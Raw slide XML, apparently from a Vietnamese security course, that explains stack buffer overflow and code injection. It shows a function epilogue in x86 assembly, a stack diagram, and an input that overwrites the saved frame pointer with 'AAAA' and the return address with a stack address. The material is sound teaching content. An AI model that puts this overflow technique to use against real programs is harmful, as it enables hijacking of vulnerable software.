              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1762915974"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5896203" y="1219200"/>
          <a:ext cx="2721206"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7498">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3">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solidFill>
                            <a:schemeClr val="bg2">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(RIP)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="1155CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t> 0xbfffcd40</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bg2">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(SFP)</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     </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'AAAA'</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5770166"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3248228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Hệ quả</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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;912;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C0DA7FF-F714-33D9-1DB3-FBCEE2A606F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="27446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3622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t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>addl $4, %esp</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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>movl %ebp, %esp</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    popl %ebp</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14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D46E79-6492-0698-052A-BAC3752A519F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2291840" y="3502264"/>
            <a:ext cx="990600" cy="307736"/>
            <a:chOff x="2133600" y="3886200"/>
            <a:chExt cx="1143000" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55F984E3-2823-DB1A-8386-2B69A1FCF5F6}"/>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9" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FDAFAB1-100E-E0A1-6D6F-26FE424480F5}"/>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54EE3765-ABD0-7FE9-02A1-A562E263BA82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5091680" y="3654300"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="6025504"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25BFEAA8-7AFC-4090-19B6-0EBFD9475205}"/>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18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E8B358C-11E1-C8C3-48F1-6BF0CBA28F57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6881875" y="479801"/>
            <a:ext cx="1025749" cy="307736"/>
            <a:chOff x="5105399" y="4189532"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C7D2AC-118D-7A3C-5EFF-48D5F208A6C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5105399" y="4189532"/>
              <a:ext cx="533401" cy="307736"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solid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341932"/>
              <a:ext cx="257402" cy="1468"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>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320C7990-3627-4409-FC43-BBCB05CAF925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8610600" y="609600"/>
            <a:ext cx="381000" cy="3505200"/>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923;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0EEF6FE-D6EC-D433-382F-C78015A75285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1219200"/>
            <a:ext cx="26766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Đầu vào</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12</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'\x40\xcd\xff\xbf'</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10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1D5A8AA-B347-CCFC-530B-9EF0E3497463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7806256" y="-76200"/>
            <a:ext cx="956744" cy="1234996"/>
            <a:chOff x="761773" y="198248"/>
            <a:chExt cx="1522825" cy="1965711"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 2" descr="Breezeeweezee Cosplay Blog">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2911FDE0-538F-BFBC-AF87-F017D4269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A6934-5136-4674-ECBC-68625BAC6699}"/>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F6962D-32AE-37A8-2C2D-BCD49C9F2F3A}"/>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446BEDB-9C42-2431-65FC-0EB1C6A17B59}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;1033;p82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA7805CA-4CB0-6955-5422-789E4924188D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="176118" y="5007170"/>
            <a:ext cx="4724400" cy="1508075"/>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Kết thúc hàm </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="1"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vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: khôi phục EBP bằng SFP, bởi vậy EBP trỏ tới ô nhớ có địa chỉ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'AAAA’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>. Hiện tại điều này chưa gây ảnh hưởng gì. Tuy nhiên, sau đó lỗi có thể phát sinh khi hàm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> trả về.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DC3E25E-5E7B-1877-9A69-BC2A7CEDCAA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8617410" y="3810000"/>
            <a:ext cx="221790" cy="1828800"/>
            <a:chOff x="8617409" y="4038600"/>
            <a:chExt cx="374191" cy="1828800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Straight Connector 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EAE6286-EAC1-6B2B-57C1-F1699B88A4ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8617409" y="4038600"/>
              <a:ext cx="374191"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A37E64-B7A8-9A6A-8783-71256B015FD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8991600" y="4038600"/>
              <a:ext cx="0" cy="18288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C12422-E585-2142-A100-5DD0C0E53BA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8617409" y="5867400"/>
              <a:ext cx="362723"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5" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CE39102-3702-3D9D-29DB-C16984844BC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1297932915"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5896203" y="1219200"/>
          <a:ext cx="2721206"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7498">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3">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solidFill>
                            <a:schemeClr val="bg2">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(RIP)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="1155CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t> 0xbfffcd40</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bg2">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(SFP)</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     </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'AAAA'</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5770166"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2400591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B41-C974-28DA-22B7-4B2D25D1E247}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Code Injection – Hệ quả</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79552859-B6C2-AF2C-2550-F0678CE65492}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;912;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C0DA7FF-F714-33D9-1DB3-FBCEE2A606F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="29732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D5C53C1C-C019-2A47-8ADC-B49B534EC364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="2590800"/>
            <a:ext cx="2057400" cy="2400627"/>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t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>addl $4, %esp</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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>movl %ebp, %esp</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>popl %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">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ret</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3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54EE3765-ABD0-7FE9-02A1-A562E263BA82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5091680" y="3352800"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="6025504"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25BFEAA8-7AFC-4090-19B6-0EBFD9475205}"/>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7" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2613AB2-E616-2742-6522-91D7D4377CCF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="16"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18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E8B358C-11E1-C8C3-48F1-6BF0CBA28F57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6881875" y="479801"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="4189532"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C7D2AC-118D-7A3C-5EFF-48D5F208A6C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5105399" y="4189532"/>
              <a:ext cx="533401" cy="307736"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solid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24" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA748BF0-E72C-8A0A-CD4F-2880717FC111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="23" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5638800" y="4341932"/>
              <a:ext cx="257402" cy="1468"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>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320C7990-3627-4409-FC43-BBCB05CAF925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8610600" y="609600"/>
            <a:ext cx="381000" cy="3505200"/>
            <a:chOff x="8610600" y="3733800"/>
            <a:chExt cx="228600" cy="609600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="Straight Connector 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E05963F0-A542-4BFB-3996-CDB8CCC10565}"/>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6FB5BF4-C3D7-650C-DCB5-FB1C4F7190F7}"/>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00D8458-E5EF-8038-3AC9-4E27FC22FEF1}"/>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Google Shape;923;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0EEF6FE-D6EC-D433-382F-C78015A75285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1447800"/>
            <a:ext cx="2676600" cy="92329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600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Đầu vào</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12</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'\x40\xcd\xff\xbf'</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10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1D5A8AA-B347-CCFC-530B-9EF0E3497463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7806256" y="-76200"/>
            <a:ext cx="956744" cy="1234996"/>
            <a:chOff x="761773" y="198248"/>
            <a:chExt cx="1522825" cy="1965711"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 2" descr="Breezeeweezee Cosplay Blog">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2911FDE0-538F-BFBC-AF87-F017D4269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A6934-5136-4674-ECBC-68625BAC6699}"/>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F6962D-32AE-37A8-2C2D-BCD49C9F2F3A}"/>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446BEDB-9C42-2431-65FC-0EB1C6A17B59}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;1033;p82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA7805CA-4CB0-6955-5422-789E4924188D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="176118" y="5235770"/>
            <a:ext cx="4724400" cy="677078"/>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Kết thúc hàm </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="1"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vulnerable</a:t>
            </a:r>
            <a:r>
